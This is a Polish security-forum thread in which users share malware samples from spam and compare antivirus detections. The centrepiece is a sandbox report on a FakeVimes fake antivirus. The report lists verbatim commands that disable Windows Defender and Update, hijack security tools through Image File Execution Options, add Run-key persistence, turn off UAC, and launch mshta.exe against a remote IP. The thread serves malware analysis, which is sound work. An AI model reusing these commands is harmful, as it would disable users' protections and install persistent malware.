Liczba postów: 439
Liczba wątków: 1
Dołączył: 03.02.2012
Reputacja:
28
2014-03-21-tomatto007_2151.7z 1.16 GB
Liczba postów: 4 766
Liczba wątków: 33
Dołączył: 16.02.2011
Reputacja:
507
FakeAV - Windows Security Master z rodziny FakeVimes
[Aby zobaczyć linki, zarejestruj się tutaj]
[Aby zobaczyć linki, zarejestruj się tutaj]
Kod: Checked for debuggers
Checked if user is admin
Connected to WWW
Consent UI change: machine\software\microsoft\windows\currentversion\policies\system\consentpromptbehavioruser = empty value key
Created a mutex named: 234-456-456-456
Created a mutex named: AMResourceMutex3
Created process: C:\Windows\system32\cmd.exe, "C:\Windows\system32\cmd.exe" /c del "C:\Users\tachion\Desktop\setup.exe" >> NUL, C:\Users\tachion\Desktop
Created process: null, C:\Users\tachion\AppData\Roaming\svc-mnay.exe, null
Created process: null, mshta.exe "http://205.234.215.211/?0=1&1=0&2=29&3=i&4=7601&5=0&6=1111&7=fgihhnqlie", null
Created process: null, Reg.EXE add "HKCU\Software\Microsoft\Windows\CurrentVersion\RUN" /v "WERsv" /t REG_SZ /d "C:\Users\tachion\AppData\Roaming\svc-mnay.exe" /f, null
Created process: null, Reg.Exe Add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msascui.exe" /v "Debugger" /t REG_SZ /d "\"wser.dll\" /z" /f, null
Created process: null, Reg.Exe Add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msmpeng.exe" /v "Debugger" /t REG_SZ /d "\"wser.dll\" /z" /f, null
Created process: null, SC.Exe config bckwfs start= disabled, null
Created process: null, SC.Exe config luafv start= disabled, null
Created process: null, SC.Exe config msmpsvc start= disabled, null
Created process: null, SC.Exe config windefend start= disabled, null
Created process: null, SC.Exe config wscsvc start= disabled, null
Created process: null, SC.Exe config wuauserv start= disabled, null
Created process: null, SC.Exe stop bckwfs, null
Created process: null, SC.Exe stop wscsvc, null
Created process: null, SC.Exe stop wuauserv, null
Defined file type created: C:\Users\tachion\AppData\Roaming\svc-mnay.exe
Defined registry AutoStart location created or modified: machine\software\microsoft\Windows NT\CurrentVersion\Image File Execution Options\k9filter.exe\Debugger = c:\windows\1.EXE
Defined registry AutoStart location created or modified: machine\software\microsoft\Windows NT\CurrentVersion\Image File Execution Options\mpcmdrun\Debugger = c:\windows\1.EXE
Defined registry AutoStart location created or modified: machine\software\microsoft\Windows NT\CurrentVersion\Image File Execution Options\mpsvc.dll\Debugger = c:\windows\1.EXE
Defined registry AutoStart location created or modified: machine\software\microsoft\Windows NT\CurrentVersion\Image File Execution Options\mpuxsrv.exe\Debugger = c:\windows\1.EXE
Defined registry AutoStart location created or modified: machine\software\microsoft\Windows NT\CurrentVersion\Image File Execution Options\msascui.exe\Debugger = "wser.dll" /z
Defined registry AutoStart location created or modified: machine\software\microsoft\Windows NT\CurrentVersion\Image File Execution Options\msascui\Debugger = c:\windows\1.EXE
Defined registry AutoStart location created or modified: machine\software\microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSconfig.exe\Debugger = c:\windows\1.EXE
Defined registry AutoStart location created or modified: machine\software\microsoft\Windows NT\CurrentVersion\Image File Execution Options\msmpeng.exe\Debugger = "wser.dll" /z
Defined registry AutoStart location created or modified: machine\software\microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSseces\Debugger = c:\windows\1.EXE
Defined registry AutoStart location created or modified: machine\System\CurrentControlSet\Services\bckd\ImagePath = 33.sys
Defined registry AutoStart location created or modified: machine\System\CurrentControlSet\Services\wuauserv\Start = 00000004
Defined registry AutoStart location created or modified: user\current\software\Microsoft\Windows\CurrentVersion\RUN\WERsv = C:\Users\tachion\AppData\Roaming\svc-mnay.exe
Deleted activity traces
Detected Anti-Malware Analyzer routine
Executed Microsoft HTML Application Host
File copied itself
File deleted itself
Got input locale identifiers
Got volume information
Internet connection: C:\user\current\AppData\Roaming\svc-mnay.exe Connects to "216.146.39.70" on port 80 (TCP - HTTP)
Looked up the external IP address
Malicious category given by Adobe Malware Classifier
Queried DNS: checkip.dyndns.org
Queried DNS: dns.msftncsi.com
Security file association change: user\current\software\microsoft\windows\currentversion\policies\associations\lowriskfiletypes = .zip;.rar;.nfo;.txt;.exe;.bat;.com;.cmd;.reg;.msi;.htm;.html;.gif;.bmp;.jpg;.avi;.mpg;.mpeg;.mov;.mp3;.m3u;.wav;
Slept over 2 minutes
System Policies change: machine\software\microsoft\windows\currentversion\policies\system\enablevirtualization = empty value key
Traces of Max++
Transfered files from and/or to internet
UAC configuration change: machine\software\microsoft\windows\currentversion\policies\system\enablelua = empty value key
Risk evaluation result: High
Report generated with Buster Sandbox Analyzer 1.88 at 22:02:13 on 22/03/2014
[ General information ]
* File name: C:\Users\tachion\Desktop\setup.exe
* File length: 1066496 bytes
* File signature (PEiD): ASProtect 1.2x - 1.3x [Registered] -> Alexey Solodovnikov
* File signature (Exeinfo): ASprotect ver 2.1 / 2.^ ( www.aspack.com ) -! Correct version detect only : ASPrINFO v 1.6 Beta 100% detector by nik0g0r 2oo7
* File type: EXE
* TLS hooks: NO
* File entropy: 7.98548 (99.8185%)
* ssdeep signature: 24576:ddqe3Hu1pA/SbQufxxoK/cRgOnmq9g6AB36rKX6tTZ:t36p4SbQuTjcOU7m6ElEd
* Adobe Malware Classifier: Malicious
* Digital signature: Unsigned
* MD5 hash: 53e7e28f383b456ee2c62b417c685eb1
[ Changes to filesystem ]
* Modifies file C:\Users\tachion\AppData\Local\Microsoft\Windows\WebCache\V01.chk
File length: 8192 bytes
File type: Unknown
MD5 hash: efc82676ddb2021a67d127ebbff278ec
* Deletes file C:\Users\tachion\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.tmp
* Creates file C:\Users\tachion\AppData\Roaming\svc-mnay.exe
File length: 1066496 bytes
File signature (PEiD): ASProtect 1.2x - 1.3x [Registered] -> Alexey Solodovnikov
File signature (Exeinfo): ASprotect ver 2.1 / 2.^ ( www.aspack.com ) -! Correct version detect only : ASPrINFO v 1.6 Beta 100% detector by nik0g0r 2oo7
File type: EXE
TLS hooks: NO
File entropy: 7.98548 (99.8185%)
ssdeep signature: 24576:ddqe3Hu1pA/SbQufxxoK/cRgOnmq9g6AB36rKX6tTZ:t36p4SbQuTjcOU7m6ElEd
Adobe Malware Classifier: Malicious
Digital signature: Unsigned
MD5 hash: 53e7e28f383b456ee2c62b417c685eb1
* Deletes file C:\Users\tachion\Desktop\setup.exe
[ Changes to registry ]
* Creates value "NukeOnDelete=00000001" in key HKEY_LOCAL_MACHINE\software\microsoft\Windows\CurrentVersion\Explorer\BitBucket
* Creates value "UseGlobalSettings=00000001" in key HKEY_LOCAL_MACHINE\software\microsoft\Windows\CurrentVersion\Explorer\BitBucket
* Empties value "EnableLUA" in key HKEY_LOCAL_MACHINE\software\microsoft\Windows\CurrentVersion\Policies\System
old value "EnableLUA=00000001"
* Empties value "ConsentPromptBehaviorUser" in key HKEY_LOCAL_MACHINE\software\microsoft\Windows\CurrentVersion\Policies\System
old value "ConsentPromptBehaviorUser=00000003"
* Empties value "EnableVirtualization" in key HKEY_LOCAL_MACHINE\software\microsoft\Windows\CurrentVersion\Policies\System
old value "EnableVirtualization=00000001"
* Creates value "Debugger=c:\windows\1.EXE" in key HKEY_LOCAL_MACHINE\software\microsoft\Windows NT\CurrentVersion\Image File Execution Options\k9filter.exe
binary data=63003A005C00770069006E0064006F00770073005C0031002E004500580045000000
* Creates value "Debugger=c:\windows\1.EXE" in key HKEY_LOCAL_MACHINE\software\microsoft\Windows NT\CurrentVersion\Image File Execution Options\mpcmdrun
binary data=63003A005C00770069006E0064006F00770073005C0031002E004500580045000000
* Creates value "Debugger=c:\windows\1.EXE" in key HKEY_LOCAL_MACHINE\software\microsoft\Windows NT\CurrentVersion\Image File Execution Options\mpsvc.dll
binary data=63003A005C00770069006E0064006F00770073005C0031002E004500580045000000
* Creates value "Debugger=c:\windows\1.EXE" in key HKEY_LOCAL_MACHINE\software\microsoft\Windows NT\CurrentVersion\Image File Execution Options\mpuxsrv.exe
binary data=63003A005C00770069006E0064006F00770073005C0031002E004500580045000000
* Creates value "Debugger=c:\windows\1.EXE" in key HKEY_LOCAL_MACHINE\software\microsoft\Windows NT\CurrentVersion\Image File Execution Options\msascui
binary data=63003A005C00770069006E0064006F00770073005C0031002E004500580045000000
* Creates value "Debugger="wser.dll" /z" in key HKEY_LOCAL_MACHINE\software\microsoft\Windows NT\CurrentVersion\Image File Execution Options\msascui.exe
binary data=220077007300650072002E0064006C006C00220020002F007A000000
* Creates value "Debugger=c:\windows\1.EXE" in key HKEY_LOCAL_MACHINE\software\microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSconfig.exe
binary data=63003A005C00770069006E0064006F00770073005C0031002E004500580045000000
* Creates value "Debugger="wser.dll" /z" in key HKEY_LOCAL_MACHINE\software\microsoft\Windows NT\CurrentVersion\Image File Execution Options\msmpeng.exe
binary data=220077007300650072002E0064006C006C00220020002F007A000000
* Creates value "Debugger=c:\windows\1.EXE" in key HKEY_LOCAL_MACHINE\software\microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSseces
binary data=63003A005C00770069006E0064006F00770073005C0031002E004500580045000000
* Creates value "ImagePath=33.sys" in key HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bckd
binary data=330033002E007300790073000000
* Modifies value "Start=00000004" in key HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\wuauserv
old value "Start=00000002"
* Modifies value "NukeOnDelete=00000001" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{01cd38c5-acde-11e2-b67a-806e6f6e6963}
old value empty
* Empties value "CachePrefix" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content
old value "CachePrefix=0000"
* Modifies value "SavedLegacySettings=460000002E000000090000000000000000000000000000000500000000000000B0166103F640CE0100000000000000000000000001000000020000000A00020F000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
old value "SavedLegacySettings=460000002C000000090000000000000000000000000000000500000000000000B0166103F640CE0100000000000000000000000001000000020000000A00020F000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
* Modifies value "DefaultConnectionSettings=460000001E000000090000000000000000000000000000000500000000000000B0166103F640CE0100000000000000000000000001000000020000000A00020F000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
old value "DefaultConnectionSettings=460000001D000000090000000000000000000000000000000500000000000000B0166103F640CE0100000000000000000000000001000000020000000A00020F000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
* Modifies value "WpadDecisionTime=1A16E5431246CF01" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-12-35-02
old value "WpadDecisionTime=07E80B1FD445CF01"
* Modifies value "WpadDecisionTime=1A16E5431246CF01" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{C9B0DDCB-A666-45E0-A453-3B1E7A772AA9}
old value "WpadDecisionTime=07E80B1FD445CF01"
* Creates value "LowRiskFileTypes=.zip;.rar;.nfo;.txt;.exe;.bat;.com;.cmd;.reg;.msi;.htm;.html;.gif;.bmp;.jpg;.avi;.mpg;.mpeg;.mov;.mp3;.m3u;.wav;" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Policies\Associations
binary data=2E007A00690070003B002E007200610072003B002E006E0066006F003B002E007400780074003B002E006500780065003B002E006200610074003B002E0063006F006D003B002E0063006D0064003B002E007200650067003B002E006D00730069003B002E00680074006D003B002E00680074006D006C003B002E006700690066003B002E0062006D0070003B002E006A00700067003B002E006100760069003B002E006D00700067003B002E006D007000650067003B002E006D006F0076003B002E006D00700033003B002E006D00330075003B002E007700610076003B000000
* Creates value "SaveZoneInformation=00000001" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Policies\Attachments
* Creates value "WERsv=C:\Users\tachion\AppData\Roaming\svc-mnay.exe" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\RUN
binary data=43003A005C00550073006500720073005C00740061006300680069006F006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C007300760063002D006D006E00610079002E006500780065000000
* Creates value "UID=fgihhnqlie" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Settings
binary data=660067006900680068006E0071006C00690065000000
* Creates value "net=_8" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Settings
binary data=5F0038000000
* Creates value "Config=DE07030006001600160003002D0055030000000000000000000000000000000000000000DE07030006001600160003002D005503DE07030006001600160003002D005503000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000B80B0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Settings
* Creates value "ip=89.76.213.4" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Settings
binary data=380039002E00370036002E003200310033002E0034000000
* Creates value "{7A80E4A8-8005-11D2-BCF8-00C04F72C717} {000214FA-0000-0000-C000-000000000046} 0xFFFF=0100000000000000981BC3411246CF01" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached
* Creates value "LangID=1504" in key HKEY_CURRENT_USER\software\classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
* Creates value "svc-mnay.exe=svc-mnay.exe" in key HKEY_CURRENT_USER\software\classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache\C:\Sandbox\tachion\DefaultBox\user\current\AppData\Roaming
binary data=7300760063002D006D006E00610079002E006500780065000000
* Creates value "mshta.exe=Host Microsoft (R) HTML Application" in key HKEY_CURRENT_USER\software\classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache\C:\Windows\System32
binary data=48006F007300740020004D006900630072006F0073006F006600740020002800520029002000480054004D004C0020004100700070006C00690063006100740069006F006E000000
[ Network services ]
* Looks for an Internet connection.
* Queries DNS "checkip.dyndns.org".
* Queries DNS "dns.msftncsi.com".
* Looks up the external IP address.
* C:\Sandbox\tachion\DefaultBox\user\current\AppData\Roaming\svc-mnay.exe Connects to "216.146.39.70" on port 80 (TCP - HTTP).
* Downloads file from "checkip.dyndns.org/".
* Opens next URLs:
http://checkip.dyndns.org/
[ Process/window/string information ]
* Gets input locale identifiers.
* Gets volume information.
* Checks for debuggers.
* Checks if user is admin.
* Deletes activity traces.
* Anti-Malware Analyzer routine: Disk information query.
* Creates a mutex "AMResourceMutex3".
* Creates process "null, C:\Users\tachion\AppData\Roaming\svc-mnay.exe, null".
* Injects code into process "C:\Sandbox\tachion\DefaultBox\user\current\AppData\Roaming\svc-mnay.exe".
* Creates process "C:\Windows\system32\cmd.exe, "C:\Windows\system32\cmd.exe" /c del "C:\Users\tachion\Desktop\setup.exe" >> NUL, C:\Users\tachion\Desktop".
* Injects code into process "C:\Windows\System32\cmd.exe".
* Enables privilege SeDebugPrivilege.
* Creates process "null, Reg.EXE add "HKCU\Software\Microsoft\Windows\CurrentVersion\RUN" /v "WERsv" /t REG_SZ /d "C:\Users\tachion\AppData\Roaming\svc-mnay.exe" /f, null".
* Injects code into process "C:\Windows\System32\reg.exe".
* Creates process "null, mshta.exe "http://205.234.215.211/?0=1&1=0&2=29&3=i&4=7601&5=0&6=1111&7=fgihhnqlie", null".
* Injects code into process "C:\Windows\System32\mshta.exe".
* Creates process "null, SC.Exe stop bckwfs, null".
* Injects code into process "C:\Windows\System32\sc.exe".
* Creates process "null, SC.Exe config bckwfs start= disabled, null".
* Creates process "null, SC.Exe stop wuauserv, null".
* Creates process "null, SC.Exe config wuauserv start= disabled, null".
* Creates process "null, SC.Exe stop wscsvc, null".
* Creates process "null, SC.Exe config wscsvc start= disabled, null".
* Creates process "null, SC.Exe config luafv start= disabled, null".
* Creates process "null, SC.Exe config windefend start= disabled, null".
* Creates process "null, SC.Exe config msmpsvc start= disabled, null".
* Creates process "null, Reg.Exe Add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msmpeng.exe" /v "Debugger" /t REG_SZ /d "\"wser.dll\" /z" /f, null".
* Creates process "null, Reg.Exe Add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msascui.exe" /v "Debugger" /t REG_SZ /d "\"wser.dll\" /z" /f, null".
* Creates a mutex "234-456-456-456".
* Opens a service named "bckwfs".
* Enumerates running processes.
* Opens a service named "wuauserv".
* Stops a service.
* Changes a service.
* Opens a service named "wscsvc".
* Opens a service named "luafv".
* Opens a service named "windefend".
* Opens a service named "msmpsvc".
* Enables privilege SeShutdownPrivilege.
* Enables privilege SeManageVolumePrivilege.
* Opens a service named "Csc".
* Opens a service named "CscService".
* Enables process privileges.
* Sleeps 1933 seconds.
[Aby zobaczyć linki, zarejestruj się tutaj]
Liczba postów: 599
Liczba wątków: 20
Dołączył: 29.07.2012
Reputacja:
10
Avast!
Malwarebytes Anti-Malware
HitmanPro
Liczba postów: 4 766
Liczba wątków: 33
Dołączył: 16.02.2011
Reputacja:
507
Strona jest czysta
Być może kiedyś rozpowszechniała 0day
Liczba postów: 599
Liczba wątków: 20
Dołączył: 29.07.2012
Reputacja:
10
Avast!
Malwarebytes Anti-Malware
HitmanPro
Nie powinno się klikać w linki ze spamu. Przez to możesz dać znać spamerowi, że czytasz jego emaile. A to oznacza jeszcze więcej spamu i więcej $$$ dla spamera za wysyłanie wiadomości.
Liczba postów: 802
Liczba wątków: 1
Dołączył: 15.04.2012
Reputacja:
3
tachion napisał(a):FakeAV - Windows Security Master z rodziny FakeVimes
Malware:
Temporary error.
EIS 12 HITMAN
Liczba postów: 485
Liczba wątków: 20
Dołączył: 26.05.2012
Reputacja:
11
Fake AV- Windows Security Master z rodziny FakeVimes
KIS 2014 wykrywa
Immunet - PC Tools Firewall Plus
Liczba postów: 191
Liczba wątków: 3
Dołączył: 14.06.2013
Reputacja:
2
Twoja stara napisał(a):Dostałem na maila.
Na Onecie i Gmailu spam to absolutna rzadkość (poza ich reklamami), a taki z malware nie pojawił się nigdy. Gdzie wy macie te poczty? 
Bitdefender Free + HitmanPro.Alert 3 (CTP4) | ADP + Ghostery | Malwarebytes Anti-Malware + HitmanPro
Liczba postów: 599
Liczba wątków: 20
Dołączył: 29.07.2012
Reputacja:
10
Eugeniusz napisał(a):Nie powinno się klikać w linki ze spamu. Przez to możesz dać znać spamerowi, że czytasz jego emaile. A to oznacza jeszcze więcej spamu i więcej $$$ dla spamera za wysyłanie wiadomości.
Nie klikałem  Skopiowałem linka i zgłosiłem jako oszustwo internetowe.
Pocztę mam na onecie.
Avast!
Malwarebytes Anti-Malware
HitmanPro
Liczba postów: 956
Liczba wątków: 57
Dołączył: 25.02.2014
Reputacja:
97
Cóż to jest?
Raport VT: [Aby zobaczyć linki, zarejestruj się tutaj]
[Aby zobaczyć linki, zarejestruj się tutaj]
Liczba postów: 58
Liczba wątków: 7
Dołączył: 25.04.2012
Reputacja:
2
Liczba postów: 4 766
Liczba wątków: 33
Dołączył: 16.02.2011
Reputacja:
507
danisss napisał(a):Zero day facebook adware
CHR Extension: (FbCores) - C:\Users\tachion\AppData\Local\Google\Chrome\User Data\Default\Extensions\egnfcacjiilnkmekmggfkdlaifjbpmkp
CHR DefaultSearchKeyword: google.com.br
[Aby zobaczyć linki, zarejestruj się tutaj] :)
Liczba postów: 485
Liczba wątków: 20
Dołączył: 26.05.2012
Reputacja:
11
Zero day facebook adware
KIS 2014 nic nie widzi
Immunet - PC Tools Firewall Plus
Liczba postów: 802
Liczba wątków: 1
Dołączył: 15.04.2012
Reputacja:
3
danisss napisał(a):Zero day facebook adware
Emsi : Trojan.GenericKD.1611623 (B)
Dodano: 26 mar 2014, 8:43
slav napisał(a):Zero day facebook adware
KIS 2014 nic nie widzi
Bo pewnie to FSB rozsyła .
EIS 12 HITMAN
Liczba postów: 485
Liczba wątków: 20
Dołączył: 26.05.2012
Reputacja:
11
No nie wiem czy FSB bo MBAM 2 też nic
Immunet - PC Tools Firewall Plus
Liczba postów: 802
Liczba wątków: 1
Dołączył: 15.04.2012
Reputacja:
3
@ slav , żart , zobacz [Aby zobaczyć linki, zarejestruj się tutaj] ,
wykrywa większość softów,ale z silnikami Bitdefendera.
EIS 12 HITMAN
Liczba postów: 485
Liczba wątków: 20
Dołączył: 26.05.2012
Reputacja:
11
Spoko.Wiem.Taż sprawdzałem.Plik wysłałem do KSN
Immunet - PC Tools Firewall Plus
Liczba postów: 670
Liczba wątków: 16
Dołączył: 05.02.2011
Reputacja:
29
danisss napisał(a):Zero day facebook adware
OSS v9.1
[Aby zobaczyć linki, zarejestruj się tutaj]
Liczba postów: 599
Liczba wątków: 20
Dołączył: 29.07.2012
Reputacja:
10
danisss napisał(a):Zero day facebook adware
Avast nie wykrywa
Malwarebytes nie wykrywa
Avast!
Malwarebytes Anti-Malware
HitmanPro
|
